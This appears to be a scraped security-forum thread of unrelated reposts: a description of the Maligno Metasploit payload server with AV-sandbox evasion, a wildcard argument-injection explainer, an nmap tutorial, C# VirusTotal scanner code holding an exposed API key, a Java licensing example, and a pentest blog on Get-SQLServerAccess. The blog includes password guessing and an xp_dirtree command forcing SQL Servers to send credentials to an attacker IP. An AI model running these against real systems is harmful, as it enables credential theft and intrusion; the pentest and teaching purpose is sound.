io.kent

virustotal: https://www.virustotal.com/en/file/e7a5d3f3fcaa0ed26322fcee935bf17e14ada26bf6d1d388771c878e415a1403/analysis/1404405117/ aici : https://yadi.sk/d/IbtVsZs6UdZmT sursa: Dichecker v2.0 new core - HTTP, SOCKS 4/5 Proxy checker

Daca tot se vorbeste de Zeus, am auzit pe mai multe forumuri rusesti private ca Zeus a fost facut de badboy, numele adevarat Alexéi Belán!

Maligno is an open source penetration testing tool that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded with Base64 prior to transmission. Changelog: Metasploit multi-host support, socks4a server support (metasploit), last resort redirection for invalid requests and hosts out of scope, automatic client code obfuscation, delayed client payload execution, automatic metasploit resource file generation. Features Encrypted communications: Maligno is a web server which communicates via HTTP or HTTPS with the clients. Communications are encrypted with AES and encoded with Base64 both for HTTP and HTTPS. Encryption and encoding parameters can be configured. Clients do NOT validate the server certificate by default. On the fly shellcode generation – per session mode: Maligno will generate shellcode while starting up, and it will cache it for later use. Maligno will serve the cached shellcode to all clients that request it during the session. Maligno will maintain a cache for each configured Metasploit payload. The cache is removed when Maligno is shut down. Multi-payload support: You may configure Maligno with several Metasploit payloads. Clients can request different payloads to the server. Payloads are referred by an index, which is passed as a GET parameter. Such parameter can be also configured. Multi-server support: Maligno can run on a single server with Metasploit or in separate machines. Clients will connect to Maligno, and Maligno will generate shellcode that points to a pre-configured Metasploit multi-handler. SOCKS4a proxy support: Maligno helps you starting a Metasploit auxiliary socks4a proxy, which can be used with payloads such as reverse_https_proxy. This will allow you to send all your traffic through your Maligno server, in case of having a multi-server environment. Scope definition: Maligno allows you to define single IP addresses or ranges. This will ensure that your shellcode is served only to machines involved in your pentest. You may also use a wildcard in order to accept ANY address. Last resort redirection: Maligno will redirect hosts out of scope, or hosts sending invalid requests, to a configured URL. Client code generator and pseudorandom obfuscator: Maligno comes with a script that will generate and obfuscate (pseudorandomly) client code ready for use, based on your server configuration. Delayed client execution: Maligno clients use a basic random execution delay, which attempts to bypass AV-sandboxes. Metasploit resource file generator: Maligno generates MSF resource files based on your configuration, which can be used with msfconsole right away. Download : http://www.encripto.no/tools/maligno-1.1.tar.gz Sursa: Maligno - Penetration Testing Tool that Serves Metasploit Payloads | KitPloit - PenTest Tools for your Security Arsenal!

https://www.avetix.com/en/ Nu mi se pare foarte bun, dar cine vrea sa-l incerce!

exploit-exercises.com provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and general cyber security issues. Nebula Nebula covers a variety of simple and intermediate challenges that cover Linux privilege escalation, common scripting language issues, and file system race conditions. Nebula is an ideal place to get started for people new to Linux exploitation. Exploit Exercises Protostar Protostar introduces basic memory corruption issues such as buffer overflows, format strings and heap exploitation under "old-style" Linux system that does not have any form of modern exploit mitigiation systems enabled. Protostar is the next progression from Nebula. Exploit Exercises Fusion Fusion continues the memory corruption, format strings and heap exploitation but this time focusing on more advanced scenarios and modern protection systems. Exploit Exercises Fusion is the place to start if you are familiar with Linux exploitation and wish to learn more about exploitation prevention systems. Aveti mai multe nivele + download sursa: Exploit Exercises

Wildcard Expansion When you type a command with a "*" in bash, bash expands it to the list of all files in the directory and passes them all as arguments to the program. For example, "rm *", will remove files in the current directory. Filenames Misinterpreted as Switches Most command line programs can take switches that affect how they work. For example, the ls command, when ran without any switches, looks like the output below. [stephen@superX foo]$ ls asdf.txt foobar -l Now let's say you want to know what group and user owns these files. You can pass "-l" to the ls program to figure that out, which looks like this: [stephen@superX foo]$ ls -l total 0 -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 -l Notice there is a file named -l in our directory. Let's try "ls *" now and see what happens: [stephen@superX foo]$ ls * -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar The last two outputs are similar, but the output of "ls *" is different. It is missing the "-l" file, which was interpreted by ls as the "-l" switch. There's no way for the ls program to tell that the "-l" came from the wildcard expansion and wasn't actually what we in intended. It's equivalent to running: [stephen@superX foo]$ ls asdf.txt foobar.txt -l -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt -rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar Security Problems Misinterpreted filenames can lead to problems when someone runs a wildcard expansion on a folder they download from the Internet, for example, without first checking the filenames. Could this be used to attack someone's computer? Can we make a program do something bad by having specially-named files in the directory? Yes, it turns out that we can. Aici : https://dicesoft.net/projects/wildcard-code-execution-exploit.htm

(Also posted this on VipHackforums and Ubers) Well, I got a lot of questions about my personal host discovery. That's why I made this tutorial on how to discover specific hosts. NMAP Well first we need to know in what kind of subnet we are. How to do this? Well, launch a terminal and type You will see a output like this: your address: 192.168.178.19 Subnetmask: 225.225.225.0 What does this mean? Well, the address and the subnet belong together in a class. You can define the classes with A, B, C, D and E but we will discuss A, B, C because they are the most common. Class---- Range ----------- Subnet What do you notice here? My address starts with 192. That means it is a class C address. A class C address comes along with the subnet 255.255.255.0. Now we need to convert our subnet address to binary to know our CIDR Now count the 1's and your see a class C address has a CIDR of /24 (so 24 1's) Now perform a NMAP scan with the options: -PR = ARP scan -O = OS -ns = no ports(If you don't want to search for a specific host you don't have to add this one) (I use a ARP scan so it will be less "troublesome". I'm also quite a fan of TCP SYN scans(-sS) But I prefer this scan Now, launch the NMAP command with the options and your address / CIDR: The output will be like this: Now lets say I want to find the user's PC of RB. What do we now? Well we know he runs his PC on Windows 7 We see that 192.168.178.17 runs on this. Mhh lets perform a smb os discovery. Run the command: nmap --script=smb-os-discovery 192.168.178.17 Now, we know 192.168.178.17 is the host we were looking for = RB running: Windows 7 Home Premium 7601 Service Pack 1 (Windows 7 Home Premium 6.1)

Sources : Form1.cs // VirusTotal Scanner 0.1 // (C) Doddy Hackman 2014 using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Text; using System.Windows.Forms; using System.IO; using System.Text.RegularExpressions; namespace virustotalscanner { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void button1_Click(object sender, EventArgs e) { openFileDialog1.ShowDialog(); if (File.Exists(openFileDialog1.FileName)) { textBox1.Text = openFileDialog1.FileName; } } private void button2_Click(object sender, EventArgs e) { DH_Tools tools = new DH_Tools(); if (File.Exists(textBox1.Text)) { string md5 = tools.md5file(textBox1.Text); listView1.Items.Clear(); richTextBox1.Clear(); string apikey = "07d6f7d301eb1ca58931a396643b91e4c98f830dcaf52aa646f034c876689064"; // API Key toolStripStatusLabel1.Text = "[+] Scanning ..."; this.Refresh(); string code = tools.tomar("http://www.virustotal.com/vtapi/v2/file/report", "resource=" + md5 + "&apikey=" + apikey); code = code.Replace("{\"scans\":", ""); string anti = ""; string reanti = ""; Match regex = Regex.Match(code, "\"(.*?)\": {\"detected\": (.*?), \"version\": (.*?), \"result\": (.*?), \"update\": (.*?)}", RegexOptions.IgnoreCase); while (regex.Success) { anti = regex.Groups[1].Value; reanti = regex.Groups[4].Value; reanti = reanti.Replace("\"", ""); ListViewItem item = new ListViewItem(); if (reanti == "null") { item.ForeColor = Color.Cyan; reanti = "Clean"; } else { item.ForeColor = Color.Red; } item.Text = anti; item.SubItems.Add(reanti); listView1.Items.Add(item); regex = regex.NextMatch(); } regex = Regex.Match(code, "\"scan_id\": \"(.*?)\"", RegexOptions.IgnoreCase); if (regex.Success) { richTextBox1.AppendText("[+] Scan_ID : " + regex.Groups[1].Value + Environment.NewLine); } else { MessageBox.Show("Not Found"); } regex = Regex.Match(code, "\"scan_date\": \"(.*?)\"", RegexOptions.IgnoreCase); if (regex.Success) { richTextBox1.AppendText("[+] Scan_Date : " + regex.Groups[1].Value + Environment.NewLine); } regex = Regex.Match(code, "\"permalink\": \"(.*?)\"", RegexOptions.IgnoreCase); if (regex.Success) { richTextBox1.AppendText("[+] PermaLink : " + regex.Groups[1].Value + Environment.NewLine); } regex = Regex.Match(code, "\"verbose_msg\": \"(.*?)\", \"total\": (.*?), \"positives\": (.*?),", RegexOptions.IgnoreCase); if (regex.Success) { richTextBox1.AppendText("[+] Founds : " + regex.Groups[3].Value + "/" + regex.Groups[2].Value + Environment.NewLine); } toolStripStatusLabel1.Text = "[+] Finished"; this.Refresh(); } else { MessageBox.Show("File not found"); } } } } // The End ? DH_Tools.cs // Class Name : DH Tools // Version : Beta // Author : Doddy Hackman // (C) Doddy Hackman 2014 // // Functions : // // [+] HTTP Methods GET & POST // [+] Get HTTP Status code number // [+] HTTP FingerPrinting // [+] Read File // [+] Write File // [+] GET OS // [+] Remove duplicates from a List // [+] Cut urls from a List // [+] Download // [+] Upload // [+] Get Basename from a path // [+] Execute commands // [+] URI Split // [+] MD5 Hash Generator // [+] Get MD5 of file // [+] Get IP address from host name // // Credits : // // Method POST -> https://technet.rapaport.com/Info/Prices/SampleCode/Full_Example.aspx // Method GET -> http://stackoverflow.com/questions/4510212/how-i-can-get-web-pages-content-and-save-it-into-the-string-variable // HTTP Headers -> http://msdn.microsoft.com/en-us/library/system.net.httpwebresponse.headers%28v=vs.110%29.aspx // List Cleaner -> http://forums.asp.net/t/1318899.aspx?Remove+duplicate+items+from+List+String+ // Execute command -> http://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C // MD5 Hash Generator -> http://www.java2s.com/Code/CSharp/Security/GetandverifyMD5Hash.htm // Get MD5 of file -> http://stackoverflow.com/questions/10520048/calculate-md5-checksum-for-a-file // // Thanks to : $DoC and atheros14 (Forum indetectables) // using System; using System.Collections.Generic; using System.Text; using System.Net; using System.IO; using System.Text.RegularExpressions; using System.Security.Cryptography; namespace virustotalscanner { class DH_Tools { public string toma(string url) { string code = ""; try { WebClient nave = new WebClient(); nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"; code = nave.DownloadString(url); } catch { // } return code; } public string tomar(string url, string par) { string code = ""; try { HttpWebRequest nave = (HttpWebRequest) WebRequest.Create(url); nave.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"; nave.Method = "POST"; nave.ContentType = "application/x-www-form-urlencoded"; Stream anteantecode = nave.GetRequestStream(); anteantecode.Write(Encoding.ASCII.GetBytes(par), 0, Encoding.ASCII.GetBytes(par).Length); anteantecode.Close(); StreamReader antecode = new StreamReader(nave.GetResponse().GetResponseStream()); code = antecode.ReadToEnd(); } catch { // } return code; } public string respondecode(string url) { String code = ""; try { HttpWebRequest nave = (HttpWebRequest)WebRequest.Create(url); nave.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"; HttpWebResponse num = (HttpWebResponse)nave.GetResponse(); int number = (int)num.StatusCode; code = Convert.ToString(number); } catch { code = "404"; } return code; } public string httpfinger(string url) { String code = ""; try { HttpWebRequest nave1 = (HttpWebRequest)WebRequest.Create(url); HttpWebResponse nave2 = (HttpWebResponse)nave1.GetResponse(); for (int num = 0; num < nave2.Headers.Count; ++num) { code = code + "[+] " + nave2.Headers.Keys[num] + ":" + nave2.Headers[num] + Environment.NewLine; } nave2.Close(); } catch { // } return code; } public string openword(string file) { String code = ""; try { code = System.IO.File.ReadAllText(file); } catch { // } return code; } public void savefile(string file, string texto) { try { System.IO.StreamWriter save = new System.IO.StreamWriter(file, true); save.Write(texto); save.Close(); } catch { // } } public string getos() { string code = ""; try { System.OperatingSystem os = System.Environment.OSVersion; code = Convert.ToString(os); } catch { code = "?"; } return code; } public List<string> repes(List<string> array) { List<string> repe = new List<string>(); foreach (string lin in array) { if (!repe.Contains(lin)) { repe.Add(lin); } } return repe; } public List<string> cortar(List<string> otroarray) { List<string> cort = new List<string>(); foreach (string row in otroarray) { String lineafinal = ""; Match regex = Regex.Match(row, @"(.*)\?(.*)=(.*)", RegexOptions.IgnoreCase); if (regex.Success) { lineafinal = regex.Groups[1].Value + "?" + regex.Groups[2].Value + "="; cort.Add(lineafinal); } } return cort; } public string download(string url, string savename) { String code = ""; WebClient nave = new WebClient(); nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"; try { nave.DownloadFile(url, savename); code = "OK"; } catch { code = "Error"; } return code; } public string upload(string link, string archivo) { String code = ""; try { WebClient nave = new WebClient(); nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"; byte[] codedos = nave.UploadFile(link, "POST", archivo); code = System.Text.Encoding.UTF8.GetString(codedos, 0, codedos.Length); } catch { code = "Error"; } return code; } public string basename(string file) { String nombre = ""; FileInfo basename = new FileInfo(file); nombre = basename.Name; return nombre; } public string console(string cmd) { string code = ""; try { System.Diagnostics.ProcessStartInfo loadnow = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd); loadnow.RedirectStandardOutput = true; loadnow.UseShellExecute = false; loadnow.CreateNoWindow = true; System.Diagnostics.Process loadnownow = new System.Diagnostics.Process(); loadnownow.StartInfo = loadnow; loadnownow.Start(); code = loadnownow.StandardOutput.ReadToEnd(); } catch { code = "Error"; } return code; } public string urisplit(string url, string opcion) { string code = ""; Uri dividir = new Uri(url); if (opcion == "host") { code = dividir.Host; } if (opcion == "port") { code = Convert.ToString(dividir.Port); } if (opcion == "path") { code = dividir.LocalPath; } if (opcion == "file") { code = dividir.AbsolutePath; FileInfo basename = new FileInfo(code); code = basename.Name; } if (opcion == "query") { code = dividir.Query; } if (opcion == "") { code = "Error"; } return code; } public string convertir_md5(string text) { MD5 convertirmd5 = MD5.Create(); byte[] infovalor = convertirmd5.ComputeHash(Encoding.Default.GetBytes(text)); StringBuilder guardar = new StringBuilder(); for (int numnow = 0; numnow < infovalor.Length; numnow++) { guardar.Append(infovalor[numnow].ToString("x2")); } return guardar.ToString(); } public string md5file(string file) { string code = ""; try { var gen = MD5.Create(); var ar = File.OpenRead(file); code = BitConverter.ToString(gen.ComputeHash(ar)).Replace("-", "").ToLower(); } catch { code = "Error"; } return code; } public string getip(string host) { string code = ""; try { IPAddress[] find = Dns.GetHostAddresses(host); code = find[0].ToString(); } catch { code = "Error"; } return code; } } } // The End ? VirusTotal Scanner | Free software downloads at SourceForge.net

Am postat dimineata! Si am sters postul ca este postat! https://rstforums.com/forum/86203-watch-realtime-hacking-map-world.rst

This is how it works in general: The customer who buys your software tells you the username to license the software with. Upon paying for the software, he will get: the software itself that has a personal serial number and an activation key The activation key is generated from the username and the serial number. You may also include more information as you like, including hardware information which will limit the use of the software to a certain device (caution here, it may piss off the users if the software doesn't work anymore after a hardware update). You put this into a hashing algorithm and thus get the activation key. Example: activationKey = hash(username + serial + SOME_CODE) The customer starts your program and is asked for username and activation key. He enters it and the program will verify the activation key by comparing it with the hash it generates from the username and the serial. If both are the same, the software will run properly. The license information is saved subsequently in the app data directory, so the user only has to input his key once. Example GUI program with source: zip file attached Here is also valid username-key-pair example for testing: username: test activation key: ec80b8ca371d17aaa5361d811f8bc7a3f4207134af3dc70dbbac102592a91533 Source: import java.io.BufferedReader; import java.io.BufferedWriter; import java.io.File; import java.io.FileNotFoundException; import java.io.FileReader; import java.io.FileWriter; import java.io.IOException; import java.io.InputStreamReader; import java.io.Reader; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import javax.swing.JOptionPane; public class License { private static final String SERIAL_PATH = "serial"; private static final String LICENSE = "license"; private static final String CODE = "4e0f07ff2d9440912c928ca4986c98e97b13b5ad35dee80e9663a6357edfc2de"; private boolean activated; private String serial; private File licenseFile; public License() { prepareAppDataDir(); readSerial(); readActivationStatus(); } private void readActivationStatus() { try (BufferedReader reader = new BufferedReader(new FileReader(licenseFile))) { String username = reader.readLine(); String activationKey = reader.readLine(); activate(activationKey, username); } catch (FileNotFoundException e) { activated = false; } catch (IOException e) { e.printStackTrace(); activated = false; } } private void readSerial() { try (Reader ir = new InputStreamReader(getClass().getResourceAsStream( SERIAL_PATH)); BufferedReader reader = new BufferedReader(ir)) { serial = reader.readLine(); } catch (IOException e) { e.printStackTrace(); } } public boolean activate(String activationKey, String username) { String hash = hash(username + serial + CODE); System.out.println(hash); activated = hash.equals(activationKey); if(!activated) { removeActivationStatus(); } return activated; } public void removeActivationStatus() { licenseFile.delete(); } public void saveLicense(String key, String username) throws IOException { try(BufferedWriter writer = new BufferedWriter(new FileWriter(licenseFile))) { writer.write(username); writer.newLine(); writer.write(key); } } /** * Prepares application data directory depending on OS. */ private void prepareAppDataDir() { File appDataDir; if (System.getProperty("os.name").toLowerCase().contains("windows") && new File(System.getProperty("user.home"), "AppData\\Roaming") .exists()) { appDataDir = new File(System.getProperty("user.home"), "AppData\\Roaming\\LicensingExample"); } else { appDataDir = new File(System.getProperty("user.home"), ".licensingExample"); } createDir(appDataDir); licenseFile = new File(appDataDir.getAbsolutePath() + "/" + LICENSE); } /** * Creates directory if it doesn't exist. * * @Param dir * directory to be created */ private void createDir(File dir) { if (!dir.exists()) { if (!dir.mkdir()) { System.err.println("error creating directory " + dir.getAbsolutePath()); JOptionPane.showMessageDialog(null, "error creating directory " + dir.getAbsolutePath(), "Error", JOptionPane.ERROR_MESSAGE); } } } private String hash(String string) { MessageDigest sha256; try { sha256 = MessageDigest.getInstance("SHA-256"); byte[] hash = sha256.digest(string.getBytes()); return byteToHex(hash); } catch (NoSuchAlgorithmException e) { e.printStackTrace(); } return null; } private static String byteToHex(byte array[]) { StringBuilder buffer = new StringBuilder(); for (int i = 0; i < array.length; i++) { if ((array[i] & 0xff) < 0x10) { buffer.append("0"); } buffer.append(Integer.toString(array[i] & 0xff, 16)); } return buffer.toString().trim(); } public boolean statusActivated() { return activated; } public String getSerial() { return serial; } } FAQ Is this safe? No licensing system is safe. What can I do to make it more safe? Use obfuscation and other anti-reversing techniques, i.e. http://www.cs.sjsu.edu/faculty/stamp/students/kundu_deepti.pdf Try not to annoy the customer who was so kind to buy your software with protection techniques. Rather make the software so great that people want to pay for it in order to support it.

Introduction to Scanless SQL Server Discovery Using a variety of scanning techniques to locate SQL Servers can be very useful when you have no credentials or are hunting for SQL Servers that are not on the domain. However, the process can be noisy, time consuming, and may miss servers due to unknown subnets, the use of non-standard ports, and broadcast domain limitations. When I came across Service Principal Names (SPN) in Active Directory I knew I'd found a shortcut for quickly locating SQL Servers on the domain. Microsoft's documentation states, "A service principal name (SPN) is the name by which a client uniquely identifies an instance of a service." What that means is every service installed on a Windows domain system is registered in Active Directory. That includes SQL Server Services. As a result, any domain user can query Active Directory Services (ADS) for a full list of the SQL Servers installed on the domain without having to perform discovery scanning. Additionally, the SPNs include the correct instance names and ports which saves you the trouble of having to probe for them yourself. For more information on SPNs I wrote a blog that goes into more detail here: https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap Knowing that SPN information is available in Active Directory was great, but I quickly realized I would need a more automated solution for penetration testing. Automating with the Get-SQLServerAccess PowerShell Module After playing around for a while in the lab I thought it would be nice to have a script that could automagically pull down a list of SQL Servers from ADS via LDAP and test what access the current domain user has to each of them. Once again I turned to PowerShell to help with the automation, because it natively supports everything I needed. For example, the standard PowerShell v.3 installation includes support for LDAP queries, SQL Server queries, IP resolution, ICMP requests, and tons of data structures out of the box. No additional libraries, cmdlets, or modules required. After a little tinkering (and re-tinkering) I patched together a PowerShell module called "Get-SQLServerAccess.psm1". I've tried to add enough options to make it useful to defenders trying to identify excessive privileges quickly, and attackers trying to find soft spots that can be used for domain escalation. It's also handy for simply locating data stores. Below I've tried to break out some of the functionality into defender and attacker use cases. I wrote Get-SQLServerAccess as a PowerShell module so for those who are not familiar I’ll cover the installation first. Installing the Get-SQLServerAccess Module The script can be downloaded from my github account here. At some point I will also submit it to the Posh-SecMod project. Regardless, please note that it does require PowerShell v3. The module can be installed manually by downloading the Get-SQLServerAccess.psm1 file to one of two locations: Or you can import it using the following command: You can confirm that the module has been imported successfully with the command below (or just run it). Defender Use Cases Database administrators often provide all domain users with privileges to log into SQL Servers because they are unsure which domain groups actually need access. Additionally, older versions of SQL Server allow domain users to login by default due to a privilege inheritance issue that I covered in a previous blog here. These misconfigurations provide domain users with the means to gain unauthorized access to data and systems. As a defender it's nice to be able to quickly identify these misconfigurations so they can be easily queued up and fixed. The default output of the Get-SQLServerAccess script tries to do that by showing which SQL Servers on the domain allow the current domain user to login. Additionally, the output will show the SQL Server instance names, if the user has sysadmin access to the SQL Server, and if the account used to run the SQL Server service is a Domain Admin. Below are a few examples that I think would be handy for defenders. Obtain a list of SQL Servers from ADS via a LDAP query and attempt to login into each SQL Server instance as the current domain user. This is the default output. PS C:\Get-SQLServerAccess [*] ---------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] Domain: mydomain.com [*] DC: dc1.mydomain.com [*] Getting list of SQL Server instances from DC as mydomain\myuser... [*] 5 SQL Server instances found in LDAP. [*] Attempting to login into 5 SQL Server instances as mydomain\myuser... [*] ---------------------------------------------------------------------- [-] Failed - server1.mydomain.com is not responding to pings [-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication/query failed [+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server3.mydomain.com\SQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server4.mydomain.com\AppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes [*] ---------------------------------------------------------------------- [*] 3 of 5 SQL Server instances could be accessed. [*] End Time: 04/01/2014 10:02:00 [*] Total Time: 00:02:00 [*] Obtain a list of SQL Servers from ADS via a LDAP query and attempt to login into each SQL Server instance as the current domain user. This example will also output all results to a CSV file. PS C:\Get-SQLServerAccess -ShowSum | export-csv c:\temp\sql-server-excessive-privs.csv [*] ---------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] Domain: mydomain.com [*] DC: dc1.mydomain.com [*] Getting list of SQL Server instances from DC as mydomain\myuser... [*] 5 SQL Server instances found in LDAP. [*] Attempting to login into 5 SQL Server instances as mydomain\myuser... [*] ---------------------------------------------------------------------- [-] Failed - server1.mydomain.com is not responding to pings [-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication/query failed [+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server3.mydomain.com\SQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server4.mydomain.com\AppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes [*] ---------------------------------------------------------------------- [*] 3 of 5 SQL Server instances could be accessed. [*] End Time: 04/01/2014 10:02:00 [*] Total Time: 00:02:00 [*] ---------------------------------------------------------------------- Below is a sample screenshot of the output: The examples above show the results from my lab, but in real environments I typically see hundreds of servers. Just for fun I also recommend running this script as a domain computer account. That can be done my obtaining a LocalSystem shell with “psexec.exe –s –i cmd.exe “, and running the script as shown above. I think you'll be surprised how many SQL Servers domain computer accounts have access to. I know I was. Anyways, onto the attack examples… Attacker Use Cases There are tons common attacks against SQL Servers. Below I’ve provided examples that show how to execute five of them with help from this script. 1 Guessing weak passwords is still an effective attack technique. We usually find at least a handful of SQL Servers configured with weak passwords in every client environment. Common logins include sa, test, dba, user, and sysadmin. Common passwords include: [the username], [the company], password, Password1, and SQL. There are lots of password guessing tools for databases out there, but just for fun I added the option to provide a custom SQL login for authenticating to the SQL Server instances found in ADS. Below is an example. Note: This switch can also be handy for finding SQL Server logins used on multiple servers. PS C:\Get-SQLServerAccess -sqluser test -sqlpass test [*] ---------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] Domain: mydomain.com [*] DC: dc1.mydomain.com [*] Getting list of SQL Server instances from DC as mydomain\myuser... [*] 5 SQL Server instances found in LDAP. [*] Attempting to login into 5 SQL Server instances as test... [*] ---------------------------------------------------------------------- [-] Failed - server1.mydomain.com is not responding to pings [-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication failed [+] Failed - server3.mydomain.com,1433 (192.168.1.103) is up, but authentication failed [+] Failed - server3.mydomain.com\SQLEXPRESS (192.168.1.103) is up, but authentication failed [+] SUCCESS! - server4.mydomain.com\AppData (192.168.1.104) - Sysadmin: No - SvcIsDA: Yes [*] ---------------------------------------------------------------------- [*] 1 of 5 SQL Server instances could be accessed. [*] End Time: 04/01/2014 10:02:00 [*] Total Time: 00:02:00 [*] ---------------------------------------------------------------------- 2 Finding sensitive data is always important for a number of reasons. Using the custom “-query” switch it is possible to query each accessible SQL Server instance for the information you’re looking for. Below is a basic example that shows how to list databases that the user can access on each server. PS C:\Get-SQLServerAccess -query "select name as 'Databases' from master..sysdatabases where HAS_DBACCESS(name) = 1" [*] ---------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] Domain: mydomain.com [*] DC: dc1.mydomain.com [*] Getting list of SQL Server instances from DC as mydomain\myuser... [*] 5 SQL Server instances found in LDAP. [*] Attempting to login into 5 SQL Server instances as test... [*] ---------------------------------------------------------------------- [-] Failed - server1.mydomain.com is not responding to pings [-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication failed [+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103)-Sysadmin:No - SvcIsDA:No [+] Query sent: select name as 'Databases' from master..sysdatabases where HAS_DBACCESS(name) = 1 [+] Query output: Databases --------- master tempdb msdb [+] SUCCESS! - server3.mydomain.com\SQLEXPRESS(192.168.1.103)-Sysadmin:No-SvcIsDA:No [+] Query sent: select name as 'Databases' from master..sysdatabases where HAS_DBACCESS(name) = 1 [+] Query output: Databases --------- master tempdb msdb [+] SUCCESS! - server4.mydomain.com\AppData(192.168.1.104)-Sysadmin: Yes-SvcIsDA: Yes [+] Query sent: select name as 'Databases' from master..sysdatabases where HAS_DBACCESS(name) = 1 [+] Query output: Databases --------- master tempdb msdb PCIDataDB ApplicationDB CompanySecrects [*] ---------------------------------------------------------------------- [*] 3 of 5 SQL Server instances could be accessed. [*] End Time: 04/01/2014 10:02:00 [*] Total Time: 00:02:00 [*] ---------------------------------------------------------------------- 3 Capturing and cracking service account password hashes is also still a very effective attack used during pentests to obtain access to SQL Server service accounts. In many cases the service account has database admin privileges to all of the SQL Servers in the environment, and occasionally the accounts also have Domain Admins privileges. I’ve already written a blog on capturing and relaying SQL Server service account password hashes here. However, I have provided a quick command example showing how to force the accessible SQL Servers to authenticate to an attacker at 192.168.1.50 using the custom “-query” switch. PS C:\ Get-SQLServerAccess -query "exec master..xp_dirtree '\\192.168.1.50\file'" [*] ---------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] Domain: mydomain.com [*] DC: dc1.mydomain.com [*] Getting list of SQL Server instances from DC as mydomain\myuser... [*] 5 SQL Server instances found in LDAP. [*] Attempting to login into 5 SQL Server instances as mydomain\myuser... [*] ---------------------------------------------------------------------- [-] Failed - server1.mydomain.com is not responding to pings [-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication/query failed [+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] Custom query sent: exec master..xp_dirtree '\\192.168.1.50\file' [+] SUCCESS! - server3.mydomain.com\SQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] Custom query sent: exec master..xp_dirtree '\\192.168.1.50\file' [+] SUCCESS! - server4.mydomain.com\AppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes [+] Custom query sent: exec master..xp_dirtree '\\192.168.1.50\file' [*] ---------------------------------------------------------------------- [*] 3 of 5 SQL Server instances could be accessed. [*] End Time: 04/01/2014 10:02:00 [*] Total Time: 00:02:00 [*] ---------------------------------------------------------------------- There is a great tool called Responder that can be used for capturing password hashes being sent from each of the SQL Servers. It can be downloaded from github here. Finally, the hashes can be cracked with a tool like oclHashcat - advanced password recovery 4 Targeting shared SQL Server service accounts in order to perform SMB relay attacks almost always works. The tricky part can be figuring out which SQL Servers are configured to use the same service account. To help with that problem, I’ve added a few switches to the script that will capture and display the service accounts from all accessible servers. Those switches include “-showsum” and “-showstatus”. The service accounts can also be outputted to a csv file. Once they have been identified, the techniques outlined in my previous blog https://www.netspi.com/blog/entryid/139/executing-smb-relay-attacks-via-sql-server-using-metasploit can be used to take over the SQL Servers at the operating system level. Below is a basic example showing how to identify SQL Servers using a shared service account: PS C:\Get-SQLServerAccess -ShowSum | export-csv c:\temp\sql-server-excessive-privs.csv [*] ---------------------------------------------------------------------- [*] Start Time: 04/01/2014 10:00:00 [*] Domain: mydomain.com [*] DC: dc1.mydomain.com [*] Getting list of SQL Server instances from DC as mydomain\myuser... [*] 5 SQL Server instances found in LDAP. [*] Attempting to login into 5 SQL Server instances as mydomain\myuser... [*] ---------------------------------------------------------------------- [-] Failed - server1.mydomain.com is not responding to pings [+] SUCCESS! - server2.mydomain.com\AppOneDev (192.168.1.102) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server3.mydomain.com\AppOneProd (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server3.mydomain.com\SQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No [+] SUCCESS! - server4.mydomain.com\AppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes [*] ---------------------------------------------------------------------- [*] 3 of 5 SQL Server instances could be accessed. [*] End Time: 04/01/2014 10:02:00 [*] Total Time: 00:02:00 [*] ---------------------------------------------------------------------- In this example you can see that three of the servers are using a shared domain services account. 5 